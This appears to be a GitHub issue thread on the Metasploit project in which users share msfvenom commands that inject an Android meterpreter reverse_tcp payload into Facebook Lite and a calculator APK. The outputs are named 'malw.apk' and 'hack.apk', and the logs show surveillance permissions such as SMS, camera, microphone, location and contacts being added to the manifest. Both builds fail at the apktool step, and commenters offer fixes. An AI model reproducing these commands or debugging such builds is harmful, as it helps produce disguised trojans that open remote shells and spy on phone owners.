### ISSUE TITLE
Can't rebuild embeded apk with Metasploit!

### ISSUE THREAD

**Issue by zer0overflow** [rapid7/metasploit-framework#11921]
```
msfvenom -x facebook_lite_v147.0.0.10.114.apk -p android/meterpreter/reverse_tcp LHOST=my.ip.org LPORT=8080 -o malw.apk
Using APK template: facebook_lite_v147.0.0.10.114.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.rcthf
[*] Loading /tmp/d20190601-30789-vave0f/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Rebuilding facebook_lite_v147.0.0.10.114.apk with meterpreter injection as /tmp/d20190601-30789-vave0f/output.apk
[-] I: Using Apktool 2.4.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20190601-30789-vave0f/original/AndroidManifest.xml:67: error: No resource identifier found for attribute 'appComponentFactory' in package 'android'
W: 
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_6486587573234761517.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 26, --version-code, 155221107, --version-name, 147.0.0.10.114, --no-version-vectors, -F, /tmp/APKTOOL6354714067077634255.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20190601-30789-vave0f/original/res, -M, /tmp/d20190601-30789-vave0f/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
```

========================================================================

I have latest version of everythong
#uname -a
Linux parrot 4.19.0-parrot4-28t-amd64 #1 SMP Parrot 4.19.28-2parrot4.28t (2019-04-18) x86_64 GNU/Linux
#apktool -v
Apktool v2.4.0 - a tool for reengineering Android apk files
with smali v2.2.6 and baksmali v2.2.6

**Comment by busterb** [comment]
> W: /tmp/d20190601-30789-vave0f/original/AndroidManifest.xml:67: error: No resource identifier found for attribute 'appComponentFactory' in package 'android'

Sounds like the facebook APK is missing a resource that is needed here. You might try a different APK file.

**Comment by timwr** [comment]
You could also try `apktool empty-framework-dir --force` and retry.

**Comment by Dhruv9q** [comment]
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.0.0.4 LPORT=8080 -x calc.apk -f raw -o hack.apk
Using APK template: calc.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.miui.calculator.shsww
[*] Loading /tmp/d20250523-14075-b5hc3d/original/smali/com/miui/calculator/CalculatorApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20250523-14075-b5hc3d/output.apk
[-] I: Using Apktool 2.11.0 on output.apk with 8 threads
I: Checking whether sources have changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources have changed...
I: Building resources with aapt2...
Exception in thread "main" brut.androlib.exceptions.AndrolibException: brut.cutil_Jar_88907297874972491972358513018960044055.tmp, compile, --dir, /tmp/d204075-b5hc3d/original/build/resources.zip]
        at brut.androlib.AaptInvoker.invoke(SourceFile:0)
        at brut.androlib.ApkBuilder.buildResources(SourceFile:0)
        at brut.androlib.ApkBuilder.build(SourceFile:0)
        at brut.apktool.Main.main(SourceFile:0)
Caused by: brut.common.BrutException: could not exec (exit code = 2): [/tmp/b, --dir, /tmp/d20250523-14075-b5hc3d/original/res, --legacy, -o, /tmp/d202505
        at brut.util.OS.exec(SourceFile)
        ... 4 more
W: /tmp/brut_util_Jar_88907297874972491972358513018960044055.tmp: 1: ELF: not
W: /tmp/brut_util_Jar_88907297874972491972358513018960044055.tmp: 2: Syntax e
Error: apktool execution failed


Can anyone please help me to solve this error
